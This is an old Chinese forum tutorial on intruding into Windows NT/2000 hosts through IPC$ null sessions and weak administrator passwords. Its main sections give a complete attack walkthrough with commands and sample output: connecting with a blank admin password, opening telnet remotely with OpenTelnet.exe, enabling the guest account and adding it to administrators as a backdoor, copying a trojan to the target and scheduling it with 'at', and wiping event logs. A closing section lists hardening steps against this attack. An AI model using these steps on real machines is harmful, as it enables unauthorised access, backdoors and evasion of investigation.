局域網內可以空鏈接對方機,用什麽方法入侵呢?
[ 2006-9-20 10:32:51 | By: yunlin2000 ]
目錄 :
壹 前言
二 什麽是ipc$
三 什麽是空會話
四 空會話可以做什麽
五 ipc$連接所使用的端口
六 ipc$連接在hack攻擊中的意義
七 ipc$連接失敗的常見原因
八 復制文件失敗的原因
九 如何打開目標的IPC$***享以及其他***享
十 壹些需要shell才能完成的命令
十壹 入侵中可能會用到的相關命令
十二 ipc$完整入侵步驟祥解
十三 如何防範ipc$入侵
十四 ipc$入侵問答精選
十五 結束的話
壹 前言
網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄。
不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第壹次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的種種迷惑(妳隨便找壹個hack論壇搜壹下ipc$,看看存在的疑惑有多少)。因此我參考了網上的壹些資料,教程以及論壇帖子,寫了這篇總結性質的文章,想把壹些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!
註意:本文所討論的各種情況均默認發生在win NT/2000環境下,win98將不在此次討論之列,而鑒於win Xp在安全設置上有所提高,個別操作並不適用,有機會將單獨討論。
二 什麽是ipc$
IPC$(Internet Process Connection)是***享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。IPC$是NT/2000的壹項新功能,它有壹個特點,即在同壹時間內,兩個IP之間只允許建立壹個連接。NT/2000在提供了ipc$功能的同時,在初次安裝系統時還打開了默認***享,即所有的邏輯***享(c$,d$,e$……)和系統目錄winnt或windows(admin$)***享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導致了系統安全性的降低。
平時我們總能聽到有人在說ipc$漏洞,ipc$漏洞,其實ipc$並不是壹個真正意義上的漏洞,我想之所以有人這麽說,壹定是指微軟自己安置的那個‘後門’:空會話(Null session)。那麽什麽是空會話呢?
三 什麽是空會話
在介紹空會話之前,我們有必要了解壹下壹個安全會話是如何建立的。
在Windows NT 4.0中是使用挑戰響應協議與遠程機器建立壹個會話的,建立成功的會話將成為壹個安全隧道,建立雙方通過它互通信息,這個過程的大致順序如下:
1)會話請求者(客戶)向會話接收者(服務器)傳送壹個數據包,請求安全隧道的建
立;
2)服務器產生壹個隨機的64位數(實現挑戰)傳送回客戶;
3)客戶取得這個由服務器產生的64位數,用試圖建立會話的帳號的口令打亂它,將結
果返回到服務器(實現響應);
4)服務器接受響應後發送給本地安全驗證(LSA),LSA通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是服務器的本地帳號,核實本地發生;如果請求的帳號是壹個域的帳號,響應傳送到域控制器去核實。當對挑戰的響應核實為正確後,壹個訪問令牌產生,然後傳送給客戶。客戶使用這個訪問令牌連接到服務器上的資源直到建議的會話被終止。
以上是壹個安全會話建立的大致過程,那麽空會話又如何呢?
空會話是在沒有信任的情況下與服務器建立的會話(即未提供用戶名與密碼),但根據WIN2000的訪問控制模型,空會話的建立同樣需要提供壹個令牌,可是空會話在建立過程中並沒有經過用戶信息的認證,所以這個令牌中不包含用戶信息,因此,這個會話不能讓系統間發送加密信息,但這並不表示空會話的令牌中不包含安全標識符SID(它標識了用戶和所屬組),對於壹個空會話,LSA提供的令牌的SID是S-1-5-7,這就是空會話的SID,用戶名是:ANONYMOUS LOGON(這個用戶名是可以在用戶列表中看到的,但是是不能在SAM數據庫中找到,屬於系統內置的帳號),這個訪問令牌包含下面偽裝的組:
Everyone
Network
在安全策略的限制下,這個空會話將被授權訪問到上面兩個組有權訪問到的壹切信息。那麽建立空會話到底可以作什麽呢?
四 空會話可以做什麽
對於NT,在默認安全設置下,借助空連接可以列舉目標主機上的用戶和***享,訪問everyone權限的***享,訪問小部分註冊表等,並沒有什麽太大的利用價值;對2000作用更小,因為在Windows 2000 和以後版本中默認只有管理員和備份操作員有權從網絡訪問到註冊表,而且實現起來也不方便,需借助工具。從這些我們可以看到,這種非信任會話並沒有多大的用處,但從壹次完整的ipc$入侵來看,空會話是壹個不可缺少的跳板,因為我們從它那裏可以得到戶列表,這對於壹個老練的黑客已經足夠了。以下是空會話中能夠使用的具體命令:
1 首先,我們先建立壹個空會話(需要目標開放ipc$)
命令:net use \\ip\ipc$ "" /user:""
註意:上面的命令包括四個空格,net與use中間有壹個空格,use後面壹個,密碼左右各壹個空格。
2 查看遠程主機的***享資源
命令:net view \\IP
解釋:建立了空連接後,用此命令可以查看遠程主機的***享資源,如果它開了***享,可以得到如下類似類似結果:
在 \\*.*.*.*的***享資源
資源***享名 類型 用途 註釋
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看遠程主機的當前時間
命令:net time \\IP
解釋:用此命令可以得到壹個遠程主機的當前時間。
4 得到遠程主機的NetBIOS用戶名列表(需要打開自己的NBT)
nbtstat -A IP
用此命令可以得到壹個遠程主機的NetBIOS用戶名列表(需要妳的netbios支持),返回如下結果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我們經常使用空會話做的事情,好像也能獲得不少東西喲,不過要註意壹點:建立IPC$連接的操作會在EventLog中留下記錄,不管妳是否登錄成功。 好了,那麽下面我們就來看看ipc$所使用的端口是什麽?
五 ipc$所使用的端口
首先我們來了解壹些基礎知識:
1 SMB:(Server Message Block) Windows協議族,用於文件打印***享的服務;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口實現基於TCP/IP協議的NETBIOS網絡互聯。
3 在WindowsNT中SMB基於NBT實現,而在Windows2000中,SMB除了基於NBT實現,還可以直接通過445端口實現。
有了這些基礎知識,我們就可以進壹步來討論訪問網絡***享對端口的選擇了:
對於win2000客戶端來說:
1 如果在允許NBT的情況下連接服務器時,客戶端會同時嘗試訪問139和445端口,如果445端口有響應,那麽就發送RST包給139端口斷開連接,用455端口進行會話,當445端口無響應時,才使用139端口,如果兩個端口都沒有響應,則會話失敗;
2 如果在禁止NBT的情況下連接服務器時,那麽客戶端只會嘗試訪問445端口,如果445端口無響應,那麽會話失敗。由此可見,禁止了NBT後的win 2000對win NT的***享訪問將會失敗。
對於win2000服務器端來說:
1 如果允許NBT, 那麽UDP端口137, 138, TCP 端口 139, 445將開放;
2 如果禁止NBT,那麽只有445端口開放。
我們建立的ipc$會話對端口的選擇同樣遵守以上原則。顯而易見,如果遠程服務器沒有監聽139或445端口,ipc$會話是無法建立的。
六 ipc$連接在hack攻擊中的意義
就像上面所說的,即使妳建立了壹個空的連接,妳也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),如果妳能夠以某壹個具有壹定權限的用戶身份登陸的話,那麽妳就會得到相應的權限,顯然,如果妳以管理員身份登陸,嘿嘿,那妳可就了不得了,基本上可以為所欲為了。不過妳也不要高興的太早,因為管理員的密碼不是那麽好搞到的,雖然會有壹些粗心的管理員存在弱口令,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼將會越來越難的,因此今後妳最大的可能就是以極小的權限甚至是沒有權限進行連接,甚至在主機不開啟ipc$***享時,妳根本就無法連接,妳會慢慢的發現ipc$連接並不是萬能的,所以不要奢望每次連接都能成功,那是不現實的。
是不是有些灰心?倒也不用,關鍵是我們要擺正心態,不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它只是很多入侵方法中的壹種,妳有可能利用它壹擊必殺,也有可能壹無所獲,這些都是正常的,在黑客的世界裏,不是每條大路都能通往羅馬,但總有壹條路會通往羅馬,耐心的尋找吧!
七 ipc$連接失敗的常見原因
以下是壹些常見的導致ipc$連接失敗的原因:
1 IPC連接是Windows NT及以上系統中特有的功能,由於其需要用到Windows NT中很多DLL函數,所以不能在Windows 9.x/Me系統中運行,也就是說只有nt/2000/xp才可以相互建立ipc$連接,98/me是不能建立ipc$連接的;
2 如果想成功的建立壹個ipc$連接,就需要對方開啟ipc$***享,即使是空連接也是這樣,如果對方關閉了ipc$***享,妳將會建立失敗;
3 妳未啟動Lanmanworkstation服務,它提供網絡鏈結和通訊,沒有它妳無法發起連接請求(顯示名為:Workstation);
4 對方未啟動Lanmanserver服務,它提供了 RPC 支持、文件、打印以及命名管道***享,ipc$依賴於此服務,沒有它遠程主機將無法響應妳的連接請求(顯示名為:Server);
5 對方未啟動NetLogon,它支持網絡上計算機 pass-through 帳戶登錄身份;
6 對方禁止了NBT(即未打開139端口);
7 對方防火墻屏蔽了139和445端口;
8 妳的用戶名或者密碼錯誤(顯然空會話排除這種錯誤);
9 命令輸入錯誤:可能多了或少了空格,當用戶名和密碼中不包含空格時兩邊的雙引號可以省略,如果密碼為空,可以直接輸入兩個引號""即可;
10 如果在已經建立好連接的情況下對方重啟計算機,那麽ipc$連接將會自動斷開,需要重新建立連接。
另外,妳也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問:很可能妳使用的用戶不是管理員權限的,先提升權限;
錯誤號51,Windows無法找到網絡路徑:網絡有問題;
錯誤號53,找不到網絡路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火墻(端口過濾);
錯誤號67,找不到網絡名:妳的lanmanworkstation服務未啟動或者目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突:妳已經和對方建立了壹個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動:目標NetLogon服務未啟動;
錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。
八 復制文件失敗的原因
有些朋友雖然成功的建立了ipc$連接,但在copy時卻遇到了這樣那樣的麻煩,無法復制成功,那麽導致復制失敗的常見原因又有哪些呢?
1 盲目復制
這類錯誤出現的最多,占到50%以上。許多朋友甚至都不知道對方是否有***享文件夾,就進行盲目復制,結果導致復制失敗而且郁悶的很。因此我建議大家在進行復制之前務必用net view \\IP這個命令看壹下對方的***享情況,不要認為ipc$連接建立成功了就壹定有***享文件夾。
2 默認***享判斷錯誤
這類錯誤也是大家經常犯的,主要有兩個小方面:
1)錯誤的認為能建立ipc$連接的主機就壹定開啟了默認***享,因而在建立完連接之後馬上向admin$之類的默認***享復制文件,導致復制失敗。ipc$連接成功只能說明對方打開了ipc$***享,ipc$***享與默認***享是兩碼事,ipc$***享是壹個命名管道,並不是哪個實際的文件夾,而默認***享並不是ipc$***享的必要條件;
2)由於net view \\IP 無法顯示默認***享(因為默認***享帶$),因此通過這個命令,我們並不能判斷對方是否開啟了默認***享,因此如果對方未開啟默認***享,那麽所有向默認***享進行的操作都不能成功;(不過大部分掃描軟件在掃弱口令的同時,都能掃到默認***享目錄,可以避免此類錯誤的發生)
3用戶權限不夠,包括四種情形:
1)空連接向所有***享(默認***享和普通***享)復制時,大多情況下權限是不夠的;
2)向默認***享復制時,要具有管理員權限;
3)向普通***享復制時,要具有相應權限(即對方事先設定的訪問權限);
4)對方可以通過防火墻或安全軟件的設置,禁止外部訪問***享;
還需要說明壹點:不要認為administrator就壹定是管理員,管理員名稱是可以改的。
4被防火墻殺死或在局域網
也許妳的復制操作已經成功,但當遠程運行時,被防火墻殺掉了,導致找不到文件;還有可能妳把木馬復制到了局域網內的主機,導致連接失敗。因此建議妳復制時要小心,否則就前功盡棄了。
呵呵,大家也知道,ipc$連接在實際操作過程中會出現千奇百怪的問題,上面我所總結的只是壹些常見錯誤,沒說到的,只能讓大家自己去體會了。
九 如何打開目標的IPC$***享以及其他***享
目標的ipc$不是輕易就能打開的,否則就要天下打亂了。妳需要壹個admin權限的shell,比如telnet,木馬等,然後在shell下執行net share ipc$來開放目標的ipc$,用net share ipc$ /del來關閉***享。如果妳要給它開***享文件夾,妳可以用net share baby=c:\,這樣就把它的c盤開為***享名為baby***享了。
十 壹些需要shell才能完成的命令
看到很多教程這方面寫的十分不準確,壹些需要shell才能完成命令就簡簡單單的在ipc$連接下執行了,起了誤導作用。那麽下面我總結壹下需要在shell才能完成的命令:
1 向遠程主機建立用戶,激活用戶,修改用戶密碼,加入管理組的操作需要在shell下完成;
2 打開遠程主機的ipc$***享,默認***享,普通***享的操作需要在shell下完成;
3 運行/關閉遠程主機的服務,需要在shell下完成;
4 啟動/殺掉遠程主機的進程,也需要在shell下完成。
十壹 入侵中可能會用到的相關命令
請註意命令適用於本地還是遠程,如果適用於本地,妳只能在獲得遠程主機的shell後,才能向遠程主機執行。
1 建立空連接:
net use \\IP\ipc$ "" /user:""
2 建立非空連接:
net use \\IP\ipc$ "psw" /user:"account"
3 查看遠程主機的***享資源(但看不到默認***享)
net view \\IP
4 查看本地主機的***享資源(可以看到本地的默認***享)
net share
5 得到遠程主機的用戶名列表
nbtstat -A IP
6 得到本地主機的用戶列表
net user
7 查看遠程主機的當前時間
net time \\IP
8 顯示本地主機當前服務
net start
9 啟動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y
10 映射遠程***享:
net use z: \\IP\baby
此命令將***享名為baby的***享資源映射到z盤
11 刪除***享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del /y刪除全部
12 向遠程主機復制文件
copy \路徑\srv.exe \\IP\***享目錄名,如:
copy ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內
13 遠程添加計劃任務
at \\ip 時間 程序名,如:
at \\127.0.0.0 11:00 love.exe
註意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
14 開啟遠程主機的telnet
這裏要用到壹個小程序:opentelnet.exe,各大下載站點都有,而且還需要滿足四個要求:
1)目標開啟了ipc$***享
2)妳要擁有管理員密碼和帳號
3)目標開啟RemoteRegistry服務,用戶就該ntlm認證
4)對WIN2K/XP有效,NT未經測試
命令格式:OpenTelnet.exe \\server account psw NTLM認證方式 port
試例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 激活用戶/加入管理員組
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 關閉遠程主機的telnet
同樣需要壹個小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
試例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
17 刪除壹個已建立的ipc$連接
net use \\IP\ipc$ /del
(本教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區原創)
十二 ipc$完整入侵步驟祥解
其實入侵步驟隨個人愛好有所不同,我就說壹下常見的吧,呵呵,獻醜了!
1 用掃描軟件搜尋存在若口令的主機,比如流光,SSS,X-scan等,隨妳的便,然後鎖定目標,如果掃到了管理員權限的口令,妳可以進行下面的步驟了,假設妳現在得到了administrator的密碼為空
2 此時您有兩條路可以選擇:要麽給對方開telnet(命令行),要麽給它傳木馬(圖形界面),那我們就先走telnet這條路吧
3上面開telnet的命令沒忘吧,要用到opentelnet這個小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe
Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*說明妳已經打開了壹個端口90的telnet。
4 現在我們telnet上去
telnet 192.168.21.* 90
如果成功,妳將獲得遠程主機的壹個shell,此時妳可以像控制自己的機器壹樣控制妳的肉雞了,那麽做點什麽呢?把guest激活再加入管理組吧,就算留個後門了
5 C:\>net user guest /active:yes
*將Guest用戶激活,也有可能人家的guest本來就試活的,妳可以用net user guest看壹下它的帳戶啟用的值是yes還是no
6 C:\>net user guest 1234
*將Guest的密碼改為1234,或者改成妳喜歡的密碼
7 C:\>net localgroup administrators guest /add
*將Guest變為Administrator,這樣,即使以後管理員更改了他的密碼,我們也可以用guest登錄了,不過也要提醒您,因為通過安全策略的設置,可以禁止guest等帳戶的遠程訪問,呵呵,如果真是這樣,那我們的後門也就白做了,願上帝保佑Guest。
8 好了,現在我們來走另壹條路,給它傳個木馬玩玩
9 首先,我們先建立起ipc$連接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator
10 既然要上傳東西,就要先知道它開了什麽***享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的***享資源
資源***享名 類型 用途 註釋
-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我們看到對方***享了C,D兩個盤,我們下面就可以向任意壹個盤復制文件了。再次聲明,因為用net view命令無法看到默認***享,因此通過上面返回的結果,我們並不能判斷對方是否開啟了默認***享。
11 C:\>copy love.exe \\192.168.21.*\c
已復制 1 個文件
*用這個命令妳可以將木馬客戶端love.exe傳到對方的c盤下,當然,如果能復制到系統文件夾下是最好的了,不容易被發現
12 運行木馬前,我們先看看它現在的時間
net time \\192.168.21.*
\\192.168.21.*的當前時間是 2003/8/22 上午 11:00
命令成功完成
13 現在我們用at運行它吧,不過對方壹定要開了Task Scheduler服務(允許程序在指定時間運行),否則就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了壹項作業,其作業 ID = 1
14 剩下就是等了,等過了11:02,妳就可以用控制端去連接了,如果成功妳將可以用圖形界面去控制遠程主機了,如果連接失敗,那麽它可能在局域網裏,也可能程序被防火墻殺了,還可能它下線了(沒這麽巧吧),無論哪種情況妳只好放棄了
嗯,好了,兩種基本方法都講了。如果妳對上面的操作已經輕車熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec執行木馬,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接獲得shell等,這些都是可以得,隨妳的便。不過最後不要忘了把日誌清理幹凈,可以用榕哥的elsave.exe。
講了ipc$的入侵,就不能不說如何防範,那麽具體要怎樣做呢?看下面
十三 如何防範ipc$入侵
1 禁止空連接進行枚舉(此操作並不能阻止空連接的建立)
方法1:
運行regedit,找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:1
如果設置為"1",壹個匿名用戶仍然可以連接到IPC$***享,但限制通過這種連接得到列舉SAM帳號和***享等信息;在Windows 2000 中增加了"2",限制所有匿名訪問除非特別授權,如果設置為2的話,可能會有壹些其他問題發生,建議設置為1。如果上面所說的主鍵不存在,就新建壹個再改鍵值。
方法2:
在本地安全設置-本地策略-安全選項-在'對匿名連接的額外限制'中做相應設置
2 禁止默認***享
1)察看本地***享資源
運行-cmd-輸入net share
2)刪除***享(重起後默認***享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動後server服務會重新開啟)
4)禁止自動打開默認***享(此操作並未關閉ipc$***享)
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙字節值)壹個主健再改鍵值。
這兩個鍵值在默認情況下在主機上是不存在的,需要自己手動添加。
3 關閉ipc$和默認***享依賴的服務:server服務
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-選已禁用
這時可能會有提示說:XXX服務也會關閉是否繼續,因為還有些次要的服務要依賴於lanmanserver,不要管它。
4 屏蔽139,445端口
由於沒有以上兩個端口的支持,是無法建立ipc$的,因此屏蔽139,445端口同樣可以阻止ipc$入侵。
1)139端口可以通過禁止NBT來屏蔽
本地連接-TCP/IT屬性-高級-WINS-選‘禁用TCP/IT上的NETBIOS’壹項
2)445端口可以通過修改註冊表來屏蔽
添加壹個鍵值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完後重啟機器
註意:如果屏蔽掉了以上兩個端口,妳將無法用ipc$入侵別人。
3)安裝防火墻進行端口過濾
5 設置復雜密碼,防止通過ipc$窮舉出密碼。